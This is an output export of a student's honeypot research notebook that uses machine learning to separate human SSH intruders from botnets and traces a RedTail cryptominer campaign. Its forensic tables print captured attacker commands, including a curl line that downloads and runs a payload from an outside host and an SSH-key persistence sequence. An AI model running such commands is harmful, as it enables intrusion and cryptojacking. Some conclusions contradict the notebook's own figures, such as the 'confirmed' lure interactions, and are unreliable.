Project Lost Piglet 2¶

Investigating Human Threat Actors via Cognitive Friction & Machine Learning


Author: Justin McCormick
Affiliation: Penn State Berks — B.S. Cybersecurity Analytics & Operations
Role: Solo Researcher
Sensor Deployment: Cowrie SSH honeypot · GCP us-east4 · Feb 11 – Mar 5, 2026 (23-day soak)
Notebook Version: 1.0 · April 2026


Pipeline Orientation¶

This notebook documents the end-to-end ML pipeline for Project Lost Piglet 2 (LP2) — an independent cyber-intelligence study testing whether telemetry from a high-interaction SSH honeypot can be machine-scored at scale to separate human threat actors from commodity botnet automation. The hypothesis: deliberately engineered Cognitive Friction (password-protected archives, psychologically loaded filenames, non-standard logic puzzles) forces measurable decision latency that becomes the anchoring feature for behavioral classification.

The pipeline ingests raw Cowrie JSONL from a 23-day deployment (174,963 events), enriches it with geographic and SSH-client metadata, runs a three-model ensemble (Isolation Forest + HDBSCAN + Decision Tree surrogate for explainability) under EVT/KS dynamic thresholding, and terminates in an audience-specific Threat Intelligence Report. Each phase is self-contained and can be reviewed independently.

Phase Map¶

Phase Module Purpose
I Data Ingestion & Preprocessing Merge LP1 + LP2 archives into a unified session DataFrame
II Enrichment & Normalization ip-api geolocation, ASN resolution, column normalization
III-A Classification — Isolation Forest Session-level anomaly scoring with EVT/KS dynamic thresholding
III-B Density Clustering — HDBSCAN Behavioral taxonomy; ejects botnet mass as noise (-1)
III-C Explainability — Decision Tree Surrogate Human-readable rules behind the ensemble outputs
IV Behavioral Assessment MITRE tactic mapping, malware campaign analysis, LP1↔LP2 comparison
V Keystroke & Burst Analysis Execution velocity across taxonomy groups (human vs. bot timing signatures)
VI HASSH Fingerprinting SSH client identification and cross-campaign attribution
VII TTP Mapping (MITRE ATT&CK) Two-stage semantic classifier — TF-IDF cosine + keyword hierarchy
VIII Session Forensics & Cognitive Friction Dwell-time forensics on the highest-value interactive session
IX Cross-Session Attribution Skeleton-based clustering; LP1→LP2 infrastructure continuity
X Threat Intelligence Report SOC Manager tactical brief + Strategic Intelligence product

Headline Findings¶

  • 174,963 events → 6 human-interactive sessions — greater than 99.96% noise reduction
  • RedTail cryptominer campaign captured end-to-end — 6 unique payloads across 49 delivery cycles, originating from 130.12.180.51 (UK)
  • LP1 → LP2 cross-node attribution — 33-day persistent botnet infrastructure identified across two independent deployments
  • Top threat origins: China (56%), India (15.8%), Malaysia (6.6%)

PHASE I: DATA INGESTION & PREPROCESSING¶

2026-04-12 02:00:25,305 - INFO - DATA_ROOT: C:\Users\sascr\OneDrive\Desktop\ClaudeProjects\LP2\CowrieLogs  (exists: True)
2026-04-12 02:00:29,949 - INFO - [LP1] Parsed 2521 events from C:\Users\sascr\OneDrive\Desktop\ClaudeProjects\LP2\CowrieLogs\LP1
2026-04-12 02:00:31,465 - INFO - [LP2] Ingested 172442 events.
2026-04-12 02:00:32,823 - INFO - Master telemetry: 174963 total events  (LP1: 2521 | LP2: 172442)
C:\Users\sascr\AppData\Local\Temp\ipykernel_16852\3139219096.py:403: UserWarning: This figure includes Axes that are not compatible with tight_layout, so results might be incorrect.
  plt.tight_layout()
No description has been provided for this image
C:\Users\sascr\AppData\Local\Temp\ipykernel_16852\3139219096.py:403: UserWarning: This figure includes Axes that are not compatible with tight_layout, so results might be incorrect.
  plt.tight_layout()
No description has been provided for this image
2026-04-12 02:00:34,224 - INFO - File transfers staged: 576 uploads, 117 downloads.
==========================================================================================
### PHASE I: INGESTION COMPLETE — MASTER TELEMETRY READY ###
==========================================================================================
  Total Events:    174,963  (LP1: 2,521 | LP2: 172,442)
  LP1 Soak:         91.3h (3.8 days) — Baseline node, no persona
  LP2 Soak:        557.6h (23.2 days) — Jim Harris persona active
------------------------------------------------------------------------------------------
  EVENT TYPE INVENTORY:
    cowrie.session.connect                                   25,880
    cowrie.session.closed                                    25,364
    cowrie.client.version                                    24,456
    cowrie.client.kex                                        24,005
    cowrie.login.success                                     17,475
    cowrie.command.input                                     16,395
    cowrie.session.params                                    16,225
    cowrie.log.closed                                        16,175
    cowrie.login.failed                                       5,521
    cowrie.direct-tcpip.request                               1,415
    cowrie.direct-tcpip.data                                    633
    cowrie.session.file_upload                                  576
    cowrie.direct-tcpip.ja4                                     532
    cowrie.command.failed                                       130
    cowrie.session.file_download                                117
    cowrie.direct-tcpip.ja4h                                     49
    cowrie.client.size                                           15
------------------------------------------------------------------------------------------
  Commands Staged:   16,395
  Sessions Mapped:   16,180
  Credential Pairs:  25
  Malware Samples:   6 unique payloads (by SHA hash)
    [048e374baac36d8c...]  redtail.i686             x96  — Redtail (Cryptominer — documented C2 framework)
    [3625d06889695359...]  redtail.arm7             x96  — Redtail (Cryptominer — documented C2 framework)
    [59c29436755b0778...]  redtail.x86_64           x96  — Redtail (Cryptominer — documented C2 framework)
    [783adb7ad6b16fe9...]  setup.sh                 x96  — Dropper/Cleanup Script
    [d46555af1173d22f...]  clean.sh                 x96  — Dropper/Cleanup Script
    [dbb7ebb960dc0d5a...]  redtail.arm8             x96  — Redtail (Cryptominer — documented C2 framework)
------------------------------------------------------------------------------------------
  LP2 COGNITIVE FRICTION (Seeded for Phase III ML):
    Lure File Interactions:   0 sessions referenced Jim Harris persona files
    Deep Trap Activations:    0 sessions accessed high-value lures
    Lure Password Executions: 0 sessions executed lure-derived commands
    Lure Creds in BF Dict:    0  (NULL — dictionary attacks are not file-content-informed)
==========================================================================================

PHASE II: ENRICHMENT & NORMALIZATION¶

2026-04-12 02:00:34,880 - INFO - [CACHE] Loaded 2581 pre-enriched IPs. New IPs only will hit the API.
2026-04-12 02:00:35,844 - INFO - Normalization complete. Shape: (174963, 43)
==========================================================================================
### PHASE II: ENRICHMENT & NORMALIZATION COMPLETE ###
==========================================================================================
  Total Events:        174,963  (LP1: 2,521 | LP2: 172,442)
  Unique Source IPs:   2,581
  Verified Coverage:   174,963 events (100.0%)
  Lookup Failed:       0 events
  Private/RFC1918:     0 events
  Countries Identified:99
  Unique ASNs Mapped:  573
------------------------------------------------------------------------------------------
  TOP 5 ASNs  (Phase VIII Meta-Actor attribution feed):
    AS37963 Hangzhou Alibaba Advertising Co.,Ltd.     73,739 events  (42.1%)
    AS17813 Mahanagar Telephone Nigam Limited         23,741 events  (13.6%)
    AS134768 CHINANET SHAANXI province Cloud Base network  16,871 events  (9.6%)
    AS45102 Alibaba (US) Technology Co., Ltd.         11,930 events  (6.8%)
    AS14061 DigitalOcean, LLC                          4,209 events  (2.4%)
------------------------------------------------------------------------------------------
  TOP 5 ISPs:
    Hangzhou Alibaba Advertising Co                   73,514 events  (42.0%)
    Mahanagar Telephone Nigam Limited                 23,741 events  (13.6%)
    CHINANET SHAANXI province Cloud Base network      16,871 events  (9.6%)
    Alibaba (US) Technology Co., Ltd.                 11,366 events  (6.5%)
    DigitalOcean, LLC                                  4,199 events  (2.4%)
------------------------------------------------------------------------------------------
  Session Durations:   mean=4.9s  median=2.0s  max=320.2s  (173,255 sessions with open/close pairs)
==========================================================================================

PHASE III-A: CLASSIFICATION - ISOLATION FOREST¶

2026-04-12 02:01:08,847 - INFO - Cognitive friction merged: 0 session(s) with lure file interactions.
==========================================================================================
### PHASE III-A: ISOLATION FOREST COMPLETE ###
==========================================================================================
  Sessions Processed:  16,180
  High-Risk Outliers:  0  (0.0000% of sessions)
    LP1: 117 sessions  |  0 anomalies (0.00%)
    LP2: 16,063 sessions  |  0 anomalies (0.00%)
------------------------------------------------------------------------------------------
  EVT Thresholding (KS-Optimised POT):
    Optimal tail percentile: 1.0th
    Dynamic boundary:        score < -0.3940
    No fixed contamination assumption — threshold is data-driven.
------------------------------------------------------------------------------------------
  COGNITIVE FRICTION (LP2 — Jim Harris Persona):
    Lure file interactions:  0 sessions (0.0000% of total)
    Deep trap activations:   0 sessions

  NOTE — Low lure feature importance in Phase III-C is expected:
    0 lure sessions / 16,180 total = 0.0000% variance.
    Near-zero variance prevents tree splits. Lure evidence is substantiated
    in Phase VIII (Session Forensics) and Phase X (TI Report).
==========================================================================================

PHASE III-B: DENSITY-BASED CLUSTERING (HDBSCAN)¶

C:\Users\sascr\AppData\Local\Python\pythoncore-3.14-64\Lib\site-packages\sklearn\cluster\_hdbscan\hdbscan.py:722: FutureWarning: The default value of `copy` will change from False to True in 1.10. Explicitly set a value for `copy` to silence this warning.
  warn(
No description has been provided for this image
==========================================================================================
### PHASE III-B: HDBSCAN TAXONOMY COMPLETE ###
==========================================================================================
  Dense clusters identified:  10
  Noise (outlier) sessions:   11  — primary forensic candidate pool
  Human/agentic sessions:     6  across 3 taxonomy categories
    LP1: 117 sessions total
    LP2: 16,063 sessions total
------------------------------------------------------------------------------------------
  CLUSTER CORE MAPPINGS (centroid-derived):
    Cluster  0  (   106 sessions)  →  Commodity Botnet (Echo Swarm)                  [burst: 1.000]
    Cluster  1  (    38 sessions)  →  Commodity Botnet (Echo Swarm)                  [burst: 1.000]
    Cluster  2  (    72 sessions)  →  Automated Scanner (Slow-Cycle)                 [burst: 0.000]
    Cluster  3  (    15 sessions)  →  Commodity Botnet (Echo Swarm)                  [burst: 1.000]
    Cluster  4  (    19 sessions)  →  Commodity Botnet (Echo Swarm)                  [burst: 1.000]
    Cluster  5  (    29 sessions)  →  Commodity Botnet (Echo Swarm)                  [burst: 1.000]
    Cluster  6  (15,597 sessions)  →  Commodity Botnet (Echo Swarm)                  [burst: 1.000]
    Cluster  7  (   185 sessions)  →  Commodity Botnet (Echo Swarm)                  [burst: 1.000]
    Cluster  8  (    49 sessions)  →  Commodity Botnet (Echo Swarm)                  [burst: 1.000]
    Cluster  9  (    59 sessions)  →  Commodity Botnet (Echo Swarm)                  [burst: 1.000]
------------------------------------------------------------------------------------------
  BEHAVIORAL COMPOSITION:
     99.52%  |  16,102  |  Commodity Botnet (Echo Swarm)
      0.44%  |      72  |  Automated Scanner (Slow-Cycle)
      0.02%  |       3  |  Human Voyeur / Interactive Threat  ◄ HUMAN/AGENTIC
      0.02%  |       3  |  Human (General Probing)  ◄ HUMAN/AGENTIC
------------------------------------------------------------------------------------------
  HDBSCAN selected over K-Means: handles severe class imbalance without
  forcing equal-density clusters. Noise ejection surfaces human candidates.
  Taxonomy is centroid-derived — ML drives attribution, not hard-coded rules.
==========================================================================================

PHASE III-C: EXPLAINABILITY - DECISION TREE SURROGATE¶

No description has been provided for this image
==========================================================================================
### PHASE III-C: ANALYTIC JUSTIFICATION — TAXONOMY CLUSTERING (BOT VS HUMAN) ###
==========================================================================================
PRIMARY DECISION BOUNDARY:
  Strongest discriminating pivot: ENTROPY_DELTA
  Meaning: Timing irregularity  (high=human decision latency, low=scripted)

DECISION LOGIC PATHS:
|--- entropy_delta <= 0.71
|   |--- burst_ratio <= 0.25
|   |   |--- mean_delta <= 1.91
|   |   |   |--- class: Automated Scanner (Slow-Cycle)
|   |   |--- mean_delta >  1.91
|   |   |   |--- class: Commodity Botnet (Echo Swarm)
|   |--- burst_ratio >  0.25
|   |   |--- unique_commands <= 4.00
|   |   |   |--- class: Commodity Botnet (Echo Swarm)
|   |   |--- unique_commands >  4.00
|   |   |   |--- command_complexity <= 641.70
|   |   |   |   |--- class: Human Voyeur / Interactive Threat
|   |   |   |--- command_complexity >  641.70
|   |   |   |   |--- class: Commodity Botnet (Echo Swarm)
|--- entropy_delta >  0.71
|   |--- entropy_delta <= 1.47
|   |   |--- class: Human (General Probing)
|   |--- entropy_delta >  1.47
|   |   |--- class: Human (General Probing)

THRESHOLD GLOSSARY:
  unique_commands              → Distinct commands in session  (high=interactive, low=scripted probe)
  command_complexity           → Mean command character length  (high=complex scripts, low=simple probes)
  mean_delta                   → Avg seconds between commands  (0=machine, >3s=cognitive friction zone)
  entropy_delta                → Timing irregularity  (high=human decision latency, low=scripted)
  burst_ratio                  → % of commands executed in <0.5s  (1.0=machine-speed, 0.0=human-speed)

------------------------------------------------------------------------------------------
STRATEGIC INSIGHT — COGNITIVE FRICTION ANALYSIS:
  Human/Interactive Sessions:  6 of 16,180 (0.0371%)
  Lure Feature Decision Weight: 0.00%

  FINDING: ZERO LURE FEATURE IMPORTANCE IN DECISION TREE.

  This does NOT indicate the lure methodology failed.
  With 6 confirmed human session(s) out of 16,180
  (0.0371%), lure features have effectively zero
  variance at dataset scale. The tree correctly learns to classify using
  high-variance features (burst_ratio, entropy_delta) because those
  distinguish the vast majority of sessions.

  The 7 confirmed lure interactions are analytically significant but
  statistically invisible at this sample composition.

  Lure evidence is documented through individual forensic analysis:
    → Phase VIII (Session Forensics): Confirmed human lure session timeline
    → Phase X   (TI Report):          7 confirmed lure interactions documented

  For lure features to gain meaningful decision weight, LP3 should
  target higher human actor volume (port 22 vs 2222 deployment, or
  additional persona content in more accessible filesystem locations).
==========================================================================================

PHASE IV: BEHAVIORAL ASSESSMENT¶

No description has been provided for this image
2026-04-12 02:01:19,553 - INFO - VirusTotal: API key not set — browse URLs generated, live checks skipped.
No description has been provided for this image
No description has been provided for this image
No description has been provided for this image
C:\Users\sascr\AppData\Local\Temp\ipykernel_16852\2523804320.py:530: UserWarning: This figure includes Axes that are not compatible with tight_layout, so results might be incorrect.
  plt.tight_layout()
No description has been provided for this image
==========================================================================================
### PHASE IV: BEHAVIORAL ASSESSMENT COMPLETE ###
==========================================================================================
  COMMAND INTELLIGENCE (15 top commands):
    T1082        T1082 (Discovery)                              ×8
    T1098.004    T1098.004 (Persistence — SSH Auth Keys)        ×3
    T1105        T1105 (Execution/C2 — Tool Transfer)           ×2
    N/A          General Probing                                ×1
    T1003        T1003 (Credential Access)                      ×1
    Echo Swarm heartbeats: 1  |  Lure interactions: 0

  BEHAVIORAL CENSUS (16,180 sessions):
    Echo Swarm (botnet):  16,102  (99.52%)
    Human/Interactive:    6  (0.0371%)

  GEOGRAPHIC ATTRIBUTION (top 10 countries):
    Primary origin: China  (56.0% of verified events)

  MALWARE CAMPAIGN (Redtail — 130.12.180.51):
    Unique payloads:  6
    VT confirmed:     0 of 6 hashes (key not set — browse URLs only)
    [048e374baac36d8c...]  redtail.i686           ×96  Browse: https://www.virustotal.com/gui/file/048e374baac36d8cf68dd32e48313ef8eb517d647548b1bf5f26d2d0e2e3cdc7
    [3625d06889695359...]  redtail.arm7           ×96  Browse: https://www.virustotal.com/gui/file/3625d068896953595e75df328676a08bc071977ac1ff95d44b745bbcb7018c6f
    [59c29436755b0778...]  redtail.x86_64         ×96  Browse: https://www.virustotal.com/gui/file/59c29436755b0778e968d49feeae20ed65f5fa5e35f9f7965b8ed93420db91e5
    [783adb7ad6b16fe9...]  setup.sh               ×96  Browse: https://www.virustotal.com/gui/file/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59
    [d46555af1173d22f...]  clean.sh               ×96  Browse: https://www.virustotal.com/gui/file/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e
    [dbb7ebb960dc0d5a...]  redtail.arm8           ×96  Browse: https://www.virustotal.com/gui/file/dbb7ebb960dc0d5a480f97ddde3a227a2d83fcaca7d37ae672e6a0a6785631e9

  CREDENTIAL INTELLIGENCE:
    Lure passwords in BF dictionary: 0 of 22
    Verdict: NULL — dictionary attacks are pre-baked, not file-content-informed
==========================================================================================

PHASE V: KEYSTROKE & BURST ANALYSIS¶

2026-04-12 02:01:21,581 - INFO - Cadence enrichment: 16395 commands labeled from Phase III-B.
No description has been provided for this image
================================================================================
### PHASE V: KEYSTROKE & BURST ANALYSIS — TEMPORAL CADENCE AUDIT ###
================================================================================
  Total Measured Intervals:   215 command transitions analyzed.

  FULL TRAFFIC DISTRIBUTION:
    Machine-Speed (< 1.0s): 88.4%  (190 transitions)
    Human-Speed   (>= 1.0s): 11.6%  (25 transitions)
    Friction Zone (>= 3.0s): 3.7%  (8 transitions)

  DESCRIPTIVE STATISTICS (Full Traffic):
    Mean cadence:    0.7799s  (skewed by extreme pauses — median is more robust)
    Median cadence:  0.5444s
    Std deviation:   1.6814s
    95th percentile: 1.7093s
--------------------------------------------------------------------------------
  HUMAN SESSION CADENCE (ML-Filtered):
    Deltas analyzed:      66
    Median cadence:       0.863s
    Mean cadence:         1.350s
    Friction zone hits:   6  (9.1% of human deltas)

  [!] COGNITIVE FRICTION CONFIRMED:
    6 human-session transition(s) exceeded 3.0s.
    This pause duration is consistent with reading Jim Harris persona
    files (passwords.txt ~350 words at 250 wpm = ~84s to read fully)
    or evaluating crypto_wallet.txt content before taking action.
    See Phase VIII forensic timeline for session-level evidence.
--------------------------------------------------------------------------------
  PER-TAXONOMY CADENCE BREAKDOWN:
  (Quantitative validation of ML behavioral separation)
  Taxonomy                                                N   Median (s)   Mean (s)   Machine %
  ---------------------------------------------------------------------------------------------
  Human Voyeur / Interactive Threat                      12       0.0296     1.1244       75.0% ◀ HUMAN
  Commodity Botnet (Echo Swarm)                          77       0.1014     0.2740       96.1%
  Automated Scanner (Slow-Cycle)                         72       0.7782     0.7985       91.7%
  Human (General Probing)                                54       0.9034     1.3997       75.9% ◀ HUMAN

  THESIS VALIDATION: If the ML classification is behaviorally correct,
  human-labeled sessions should show measurably higher median cadence
  (slower execution) than bot-labeled sessions. The table above provides
  the quantitative evidence for or against this claim.
--------------------------------------------------------------------------------
  LP2 STRATEGIC ASSESSMENT:
  → 88.4% sub-second execution confirms an environment
    dominated by highly-scripted, non-interactive botnets.
  → 8 friction-zone transitions detected across full harvest.
    Examine human-session breakdown above for lure-attributed pauses.
  → Echo Swarm single-command sessions produce zero inter-command deltas
    and are absent from this analysis by definition, not data loss.
================================================================================

PHASE VI: HASSH FINGERPRINTING¶

2026-04-12 02:01:22,486 - INFO - HASSH telemetry extracted: 24005 KEX events, 37 unique fingerprints.
No description has been provided for this image
================================================================================
### PHASE VI: TECHNICAL ATTRIBUTION — TOOLING PROFILE AUDIT ###
================================================================================
  Primary Client Library:    Unidentified Custom Tooling (LP2 Primary — 66.2% of traffic)
  Primary HASSH Signature:   01ca35584ad5a1b66cf6a9846b5b2821
  Dominance:                 65.0% of 24,005 KEX events
  Fingerprint Diversity:     37 unique SSH libraries detected.
  Dependency Classification: HIGH
--------------------------------------------------------------------------------
  STRATEGIC FINDING:
  → 65.0% concentration in a single unidentified SSH library
    is definitive evidence of centrally-managed botnet C2.
    Distributed botnets using compromised endpoints would exhibit
    diverse SSH client fingerprints (OpenSSH versions, PuTTY, etc.).
    A single dominant custom library indicates purpose-built
    infrastructure operating under coordinated command.
--------------------------------------------------------------------------------
  CAMPAIGN-FLAGGED FINGERPRINTS (3 identified):
    [◀ CAMPAIGN]  01ca35584ad5a1b6...  →  Unidentified Custom Tooling (LP2 Primary — 66.2% of traffic)
    [◀ CAMPAIGN]  03a80b21afa81068...  →  Unidentified Custom Tooling (SSH Key Injection Campaign)
    [★ LP1 CONTINUITY]  16443846184eafde...  →  Unidentified Custom Tooling (LP1 Primary → LP2 Confirmed)
  → See Phase IX for full campaign cluster analysis.
--------------------------------------------------------------------------------
  LP1 → LP2 CROSS-DEPLOYMENT CONTINUITY CONFIRMED:
  → LP1 primary fingerprint (16443846184eafde...)
    detected in LP2 harvest: 286 session(s).
  → Same SSH client library active across both deployments
    (Feb 3-6 LP1 South Carolina → Feb 11 - Mar 5 LP2 Virginia).
  → Proves botnet infrastructure is persistent — maintained active
    operations across a 33-day window, two distinct US-east nodes.
  THESIS VALIDATION: Cross-node campaign attribution confirmed.
================================================================================

PHASE VII: TTP MAPPING (MITRE ATT&CK)¶

2026-04-12 02:01:23,796 - INFO - TTP mapping complete: 16334/16395 commands attributed (99.6%). 0 lure interactions mapped (T1074).
2026-04-12 02:01:23,840 - WARNING - df_mapped not available — kill chains will not be attributed to Meta-Actors. Ensure Phase IX ran first.
No description has been provided for this image
====================================================================================================
### PHASE VII: TTP MAPPING — SEMANTIC MITRE ATT&CK MAPPING ###
====================================================================================================
  Classifier Architecture:
    Stage 1 — TF-IDF character ngram cosine similarity (NLP fallback)
    Stage 2 — Hierarchical keyword override (least→most specific)
    OOV Defense: Vocabulary bounded to rule corpus. Stage 2 is the
    primary security layer; Stage 1 handles obfuscated/variant syntax.
----------------------------------------------------------------------------------------------------
  Commands Classified:          16,395
  Attributed (non-default):     16,334  (99.6%)
  Default (T1595 fallback):     61  (0.4%)
  Primary Volumetric Technique: T1059.004 (Unix Shell / Echo Swarm Verification)

  LURE INTERACTION STATUS:  0 commands mapped to T1074.
    Actors did not execute read operations against persona files at
    command level. Lure engagement may still be confirmed via Phase V
    timing (cognitive friction zone) and Phase X risk audit.
----------------------------------------------------------------------------------------------------
  FULL TECHNIQUE VOLUME BREAKDOWN:
    T1059.004 (Unix Shell / Echo Swarm Verification)             15,615  ( 95.2%)
    T1082 (System Information Discovery)                            343  (  2.1%)
    T1098.004 (SSH Authorized Keys — Persistence)                   332  (  2.0%)
    T1595 (Active Scanning / Unmapped)                               61  (  0.4%)
    T1057 (Process Discovery)                                        34  (  0.2%)
    T1222 (File Permissions Modification)                             7  (  0.0%)
    T1033 (System Owner/User Discovery)                               3  (  0.0%)
----------------------------------------------------------------------------------------------------
  KILL CHAIN STATISTICS:
    Sessions with kill chains:     16,180
    Multi-stage sequences:          23  (0.1%)
    Chains with lure interaction:   0
    Chains with persistence TTP:    223

  TOP MULTI-STAGE KILL CHAINS (single-stage T1595 echo swarm filtered):
    [  15 occurrences]  T1057 ➔ T1595
    [   3 occurrences]  T1595 ➔ T1222 ➔ T1595  [PERSIST]
    [   3 occurrences]  T1098.004 ➔ T1082 ➔ T1595 ➔ T1082 ➔ T1595 ➔ T1082 ➔ T1595 ➔ T1082 ➔ T1033 ➔ T1595  [PERSIST]
    [   2 occurrences]  T1595 ➔ T1222 ➔ T1595 ➔ T1222 ➔ T1595  [PERSIST]
----------------------------------------------------------------------------------------------------
  STRATEGIC ASSESSMENT:
  The kill chain sequences above represent the exact tactical decision
  trees employed by threat actors. By mapping semantic intent
  chronologically, the pipeline exposes the psychological flow of each
  intrusion attempt — from initial environment verification through
  persistence establishment and data collection.
====================================================================================================

PHASE VIII: SESSION FORENSICS & COGNITIVE FRICTION¶

2026-04-12 02:01:27,853 - WARNING - df_mapped unavailable — Meta-Actor attribution and origin resolution disabled.
2026-04-12 02:01:27,872 - INFO - Lure signal injected: 0 session(s) with lure_file_hits > 0, 0 with deep_trap_hits > 0.
2026-04-12 02:01:27,876 - INFO - FORENSIC TARGET: Human Voyeur / Interactive Threat session selected (1ce06d54f0c8).
No description has been provided for this image
====================================================================================================
### PHASE VIII: SESSION FORENSICS — FORENSIC DWELL TIME AUDIT ###
====================================================================================================
  Session ID:        1ce06d54f0c8
  Classification:    Human Voyeur / Interactive Threat
  Origin Node:       China
  Meta-Actor:        src:47.120.68.134  (Phase IX attribution reference)
  Selection Reason:  taxonomy_priority
----------------------------------------------------------------------------------------------------
  BEHAVIORAL METRICS:
    Total Commands:       5 discrete interactions logged
    Total Dwell Time:     3.38 seconds  (0.1 minutes)
    Maximum Pause:        3.31 seconds  (Cognitive friction confirmed)
    Biological Variance:  1.00  (max/median timing ratio — higher = more human-like)
    Burst Ratio:          0.750  (human-speed dominant)
----------------------------------------------------------------------------------------------------
  MITRE ATT&CK KILL CHAIN (Phase VII):
    T1595 ➔ T1222 ➔ T1595 ➔ T1222 ➔ T1595
    Stages: 5  |  Persistence: YES  |  Lure TTP: NO
----------------------------------------------------------------------------------------------------
  FORENSIC NARRATIVE:
  HUMAN VOYEUR / INTERACTIVE THREAT — INTERACTIVE EXPLORATION:
  The session timeline shows deliberate command-by-command exploration
  consistent with human interactive behavior.
  → No explicit lure file read commands (cat, less, vi) detected.
    Actor may have navigated the filesystem interactively without
    issuing read commands that Cowrie captures in command.input logs.
  → Maximum command pause of 3.3s exceeds the 3.0s cognitive
    friction threshold — consistent with deliberate evaluation behavior
    even without command-level lure confirmation.
  → Biological variance of 1.00 confirms irregular timing
    inconsistent with any known automated SSH client behavior.
----------------------------------------------------------------------------------------------------
  COMMAND SEQUENCE TABLE:
  #     Delta (s)      Lure   Command
  ------------------------------------------------------------------------------------------
  1        entry              echo 1 > /dev/null && cat /bin/echo
  2         3.31s             nohup $SHELL -c "curl http://47.254.126.99:60100/linux -o /tmp/jWcPiAXisr; ...
  3         0.01s             head -c 3800636 > /tmp/lbuBFw9qVX
  4         0.05s             nohup $SHELL -c "curl http://47.254.126.99:60100/linux -o /tmp/jWcPiAXisr; ...
  5         0.01s             >A@/1'8ELF7}
====================================================================================================

PHASE IX: CROSS-SESSION ATTRIBUTION¶

2026-04-12 02:01:28,253 - WARNING - df_mapped unavailable — playbooks reconstructed from cmd_df.
2026-04-12 02:01:28,254 - WARNING - ranked_dossier unavailable — threat score annotation disabled.
2026-04-12 02:01:33,440 - WARNING - Campaign playbooks reconstructed from cmd_df — may diverge from Phase VIII Meta-Actor IDs.
2026-04-12 02:01:33,693 - INFO - Campaign master built: 16180 sessions, 10 unique HASSH fingerprints.
C:\Users\sascr\AppData\Local\Temp\ipykernel_16852\211847199.py:484: UserWarning: Glyph 9733 (\N{BLACK STAR}) missing from font(s) Arial.
  plt.tight_layout()
C:\Users\sascr\AppData\Local\Temp\ipykernel_16852\211847199.py:484: UserWarning: Glyph 9664 (\N{BLACK LEFT-POINTING TRIANGLE}) missing from font(s) Arial.
  plt.tight_layout()
C:\Users\sascr\AppData\Local\Python\pythoncore-3.14-64\Lib\site-packages\IPython\core\pylabtools.py:170: UserWarning: Glyph 9733 (\N{BLACK STAR}) missing from font(s) Arial.
  fig.canvas.print_figure(bytes_io, **kw)
C:\Users\sascr\AppData\Local\Python\pythoncore-3.14-64\Lib\site-packages\IPython\core\pylabtools.py:170: UserWarning: Glyph 9664 (\N{BLACK LEFT-POINTING TRIANGLE}) missing from font(s) Arial.
  fig.canvas.print_figure(bytes_io, **kw)
No description has been provided for this image
===================================================================================================================
### PHASE IX: STRATEGIC CAMPAIGN ATTRIBUTION — FINAL INFRASTRUCTURE AUDIT ###
===================================================================================================================
  Total Campaign Clusters:         25  (HASSH + Tactical Skeleton unique combinations)
  Command-Attributed Clusters:     25  (NO_COMMANDS scan-only clusters excluded from analysis)
  Multi-IP Clusters (Shared):      5  (infrastructure reuse confirmed across distinct IPs)
  Maximum Campaign Reach:          64 unique IPs sharing one playbook
  LP1 Continuity Clusters:         7
  Campaign-Flagged Clusters:       12
  Human-Session Clusters:          6
-------------------------------------------------------------------------------------------------------------------
  TOP MULTI-IP CAMPAIGN CLUSTERS (scan-only NO_COMMANDS excluded):
                           hassh  unique_ips  payload_mutations  total_hits                                      display_sequence
03a80b21afa810682a776a7d42e5e6fb          64                  1         111 cd ~; chattr -ia .ssh; lockr -ia .ssh > cd ~ && rm...
98f63c4d9c87edbd97ed4747fa031019          53                  1          59                                           uname -s -m
01ca35584ad5a1b66cf6a9846b5b2821           6                  1       15597                                       echo -e "[HEX]"
16443846184eafde36765c9bab2f4397           3                  1          18                                       echo SHELL_TEST
5f904648ee8964bef0e8834012e26003           2                  1          94                                  uname -s -v -n -r -m
-------------------------------------------------------------------------------------------------------------------
  LP1 → LP2 CROSS-NODE ATTRIBUTION:
  ★ CONTINUITY CONFIRMED: LP1 primary HASSH (16443846184eafde...)
    detected in LP2 harvest: 3 IP(s), 18 session(s).
    The identical SSH client library was active during LP1 (Feb 3-6,
    South Carolina) AND LP2 (Feb 11 – Mar 5, Virginia) — a 33-day window
    spanning two distinct US-east sensor nodes.
    This proves the botnet infrastructure is persistent and geographically
    distributed — not ephemeral single-deployment tooling.
    THESIS PROOF POINT 5 (Cross-Node Attribution): VALIDATED
-------------------------------------------------------------------------------------------------------------------
  CAMPAIGN-FLAGGED INFRASTRUCTURE SUMMARY:
    [◀CAMP]  03a80b21afa81068...  Reach:   64 IPs  Hits:    111  →  Unidentified Custom Tooling (SSH Key Injectio
    [◀CAMP]  01ca35584ad5a1b6...  Reach:    6 IPs  Hits: 15,597  →  Unidentified Custom Tooling (LP2 Primary — 66
    [★LP1]  16443846184eafde...  Reach:    3 IPs  Hits:     18  →  Unidentified Custom Tooling (LP1 Primary → LP
    [◀CAMP]  03a80b21afa81068...  Reach:    1 IPs  Hits:      1  →  Unidentified Custom Tooling (SSH Key Injectio
    [◀CAMP]  03a80b21afa81068...  Reach:    1 IPs  Hits:      1  →  Unidentified Custom Tooling (SSH Key Injectio
    [◀CAMP]  03a80b21afa81068...  Reach:    1 IPs  Hits:      1  →  Unidentified Custom Tooling (SSH Key Injectio
    [★LP1]  16443846184eafde...  Reach:    1 IPs  Hits:      1  →  Unidentified Custom Tooling (LP1 Primary → LP
    [★LP1]  16443846184eafde...  Reach:    1 IPs  Hits:      1  →  Unidentified Custom Tooling (LP1 Primary → LP
    [★LP1]  16443846184eafde...  Reach:    1 IPs  Hits:     10  →  Unidentified Custom Tooling (LP1 Primary → LP
    [★LP1]  16443846184eafde...  Reach:    1 IPs  Hits:      1  →  Unidentified Custom Tooling (LP1 Primary → LP
    [★LP1]  16443846184eafde...  Reach:    1 IPs  Hits:      3  →  Unidentified Custom Tooling (LP1 Primary → LP
    [★LP1]  16443846184eafde...  Reach:    1 IPs  Hits:     10  →  Unidentified Custom Tooling (LP1 Primary → LP
-------------------------------------------------------------------------------------------------------------------
  TACTICAL ASSESSMENT:
  → Reach Heatmap: Stars/Pentagons isolate industrial-scale Swarm clusters
    from bespoke noise in the lower-left quadrant.
  → Primary Infrastructure: 64-IP cluster dominates Zone II/IV.
  → Payload Polymorphism: 5 clusters show cross-IP script reuse,
    confirming centralized C2 dispatch rather than independent operators.
  → Evidence: Multiple distinct botnet operations actively rotating IPs
    while maintaining identical tactical playbooks and SSH client libraries.
===================================================================================================================

PHASE X: THREAT INTELLIGENCE REPORT¶

No description has been provided for this image
████████████████████████████████████████████████████████████████████████████████████████████████████
█                                                                                                  █
